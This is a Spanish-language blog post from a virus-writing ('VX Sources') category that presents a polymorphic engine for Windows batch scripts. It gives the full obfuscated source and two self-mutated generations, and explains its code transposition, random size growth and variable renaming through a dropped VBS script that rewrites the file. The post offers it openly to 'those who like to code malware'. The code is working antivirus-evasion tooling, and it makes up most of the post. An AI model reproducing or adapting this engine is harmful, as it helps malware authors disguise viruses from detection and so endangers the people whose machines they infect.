Motor polimorfico para scripts batch
Código:
::Polimorphic Engine by lShadowl %ini%
@set sdjf=fictsoehnd %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
@%egnkv%off %ini%
@%agnvl: =%local enabledelayedexpansion %ini%
%egnkv%Mutando... %ini%
%fsdhf%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%fsdhf%"m%r: =%"<%0>>$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%egnkv%%a%|%fsdhf% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%fsdhf%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini%
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%egnkv%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%egnkv%kdflekj.close>>asjdhau.vbs %ini%
%egnkv%Randomize>>asjdhau.vbs %ini%
%egnkv%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%egnkv%sjdfhjs = Replace(askdajs,"sdjf",ahqiaohe)>>asjdhau.vbs %ini%
%egnkv%lasdaod = Replace(sjdfhjs,"agnvl",jdfasuu)>>asjdhau.vbs %ini%
%egnkv%skdnmxi = Replace(lasdaod,"egnkv",dwudhqw)>>asjdhau.vbs %ini%
%egnkv%sjsabwu = Replace(skdnmxi,"fsdhf",asdwdkw)>>asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m5%
:: %m7%
:: %m6%
:: %m1%
:: %m2%
:: %m4%
:: %m9%
:: %m3%
:: %m0%
:: %m8%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%fsdhf%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%agnvl% a=%a%o %mcmp%
goto :EOF)%mcmp%
%agnvl% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%agnvl%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%
Para ver como funciona os pondre mis variantes del code despues de haberlo ejecutado dos veces:
Código:
::Polimorphic Engine by lShadowl %ini%
@set pkseh=fictsoehnd %ini%
@set cneso=%pkseh:~4,1%%pkseh:~6,1%%pkseh:~3,1% %ini%
@%cneso%hfdjc=%pkseh:~6,1%%pkseh:~2,1%%pkseh:~7,1%%pkseh:~5,1% %ini%
@%cneso%vchff=%pkseh:~0,2%%pkseh:~8,2% %ini%
@%hfdjc%off %ini%
@%cneso: =%local enabledelayedexpansion %ini%
%hfdjc%Mutando... %ini%
%vchff%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%vchff%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%vchff%"m%r: =%"<%0>>$ %ini%
%cneso%/a rdnmm=%random%*9999999 %ini%
%hfdjc%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%cneso%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%hfdjc%%a%|%vchff% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%vchff%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini%
%hfdjc%%cneso%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%hfdjc%%cneso%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%hfdjc%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%hfdjc%kdflekj.close>>asjdhau.vbs %ini%
%hfdjc%Randomize>>asjdhau.vbs %ini%
%hfdjc%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%hfdjc%sjdfhjs = Replace(askdajs,"pkseh",ahqiaohe)>>asjdhau.vbs %ini%
%hfdjc%lasdaod = Replace(sjdfhjs,"cneso",jdfasuu)>>asjdhau.vbs %ini%
%hfdjc%skdnmxi = Replace(lasdaod,"hfdjc",dwudhqw)>>asjdhau.vbs %ini%
%hfdjc%sjsabwu = Replace(skdnmxi,"vchff",asdwdkw)>>asjdhau.vbs %ini%
%hfdjc%%cneso%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%hfdjc%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m5%
::-1313031124 %m5%
:: %m1%
::2020451641 %m1%
:: %m8%
::-1739870728 %m8%
:: %m7%
::-443934897 %m7%
:: %m3%
::-1117740673 %m3%
:: %m2%
::-888192539 %m2%
:: %m0%
::1245290346 %m0%
:: %m6%
::-1909547966 %m6%
:: %m4%
::-1847546953 %m4%
:: %m9%
::191549157 %m9%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%vchff%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%cneso% a=%a%o %mcmp%
goto :EOF)%mcmp%
%cneso% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%cneso%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%
Código:
::Polimorphic Engine by lShadowl %ini%
@set kjefv=fictsoehnd %ini%
@set eiotf=%kjefv:~4,1%%kjefv:~6,1%%kjefv:~3,1% %ini%
@%eiotf%gugip=%kjefv:~6,1%%kjefv:~2,1%%kjefv:~7,1%%kjefv:~5,1% %ini%
@%eiotf%mgvmh=%kjefv:~0,2%%kjefv:~8,2% %ini%
@%gugip%off %ini%
@%eiotf: =%local enabledelayedexpansion %ini%
%gugip%Mutando... %ini%
%mgvmh%"ini"<%0>$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%mgvmh%"m%r: =%"<$>nul %ini%
if %errorlevel%==0 goto :tst %ini%
%mgvmh%"m%r: =%"<%0>>$ %ini%
%eiotf%/a rdnmm=%random%*9999999 %ini%
%gugip%::%rdnmm% %%m%r: =%%%>>$ %ini%
:tst %ini%
%eiotf%a=1 %ini%
for /L %%a in (0,1,9) do call :cmp %%a %ini%
%gugip%%a%|%mgvmh% "o">nul %ini%
if %errorlevel%==0 goto :rnd_b %ini%
for %%a in (cmp rnd) do (set a=%%a %ini%
%mgvmh%"m!a: =!"<%0>>$) %ini%
type $>%0&& ping -n 1 localhost>nul %ini%
%gugip%%eiotf%dfjalds=createobject("scripting.filesystemobject")>asjdhau.vbs %ini%
%gugip%%eiotf%kdflekj=dfjalds.opentextfile(%0,1)>>asjdhau.vbs %ini%
%gugip%askdajs = kdflekj.readall>>asjdhau.vbs %ini%
%gugip%kdflekj.close>>asjdhau.vbs %ini%
%gugip%Randomize>>asjdhau.vbs %ini%
%gugip%ahqiaohe = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%jdfasuu = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%dwudhqw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%asdwdkw = chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)^&chr(int(22 * rnd) + 97)>>asjdhau.vbs %ini%
%gugip%sjdfhjs = Replace(askdajs,"kjefv",ahqiaohe)>>asjdhau.vbs %ini%
%gugip%lasdaod = Replace(sjdfhjs,"eiotf",jdfasuu)>>asjdhau.vbs %ini%
%gugip%skdnmxi = Replace(lasdaod,"gugip",dwudhqw)>>asjdhau.vbs %ini%
%gugip%sjsabwu = Replace(skdnmxi,"mgvmh",asdwdkw)>>asjdhau.vbs %ini%
%gugip%%eiotf%skdjawuj=dfjalds.opentextfile(%0,2)>>asjdhau.vbs %ini%
%gugip%skdjawuj.write sjsabwu>>asjdhau.vbs %ini%
asjdhau.vbs&& exit %ini%
:: CODIGO POLIMORFICO [INICIO] %ini%
:: %m7%
::-443934897 %m7%
::525484065 %m7%
:: %m1%
::2020451641 %m1%
::-2018256975 %m1%
:: %m9%
::191549157 %m9%
::1635032111 %m9%
:: %m2%
::-888192539 %m2%
::1875225734 %m2%
:: %m3%
::-1117740673 %m3%
::1975806665 %m3%
:: %m0%
::1245290346 %m0%
::-39677251 %m0%
:: %m8%
::-1739870728 %m8%
::-568902610 %m8%
:: %m6%
::-1909547966 %m6%
::-1999741604 %m6%
:: %m4%
::-1847546953 %m4%
::1442194522 %m4%
:: %m5%
::-1313031124 %m5%
::-1207869762 %m5%
:: CODIGO POLIMORFICO [FIN] %mcmp%
:cmp %mcmp%
%mgvmh%"m%1"<$>nul %mcmp%
if %errorlevel%==1 (%eiotf% a=%a%o %mcmp%
goto :EOF)%mcmp%
%eiotf% a=%a%x %mcmp%
goto :EOF %mcmp%
:rnd %mrnd%
%eiotf%/a r=%random%%%10 %mrnd%
goto :EOF %mrnd%
Como se puede ver el code demuestra el uso de las tecnicas de:
transpocision de codigo: notese el comportamiento de las lineas de codigo dentro de las lineas “:: CODIGO POLIMORFICO [INICIO] %ini%” y “:: CODIGO POLIMORFICO [FIN] %mcmp%”
incremento de tama?o: despues de cada ejecucion el codigo cambia de tama?o aumentando un numero aleatorio de bytes a?adiendo lineas como: “::-1739870728 %m8% “
variables aleatorias: notese que las cuatro primeras variables que se declaran en:
Código:
@set sdjf=fictsoehnd %ini% @set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini% @%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini% @%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
osea, sdjf, agnvl, egnkv y fsdhf, que contienen las cadenas “fictsoehnd” “set” “echo” y “find”, cambian en cada ejecucion del programa por medio de un sencillo script en vbs que se ejecuta al final.
Para los que les gusta codear malware, esto les puede servir de algo.
Saludos!
Advertisement
Acerca de esta Entrada
Estás leyendo “Motor polimorfico para scripts batch,” una entrada de SSW
- Publicado:
- septiembre 12, 2009 / 11:39 pm
- Categoría:
- VX Sources
- Etiquetas:
- batch, lShadowl, motor, polimorfico, polimorfismo, script, The Shadow, virus
Sin comentarios aún
Ir al formulario de comentarios | Comentarios RSS [?] | trackback uri [?]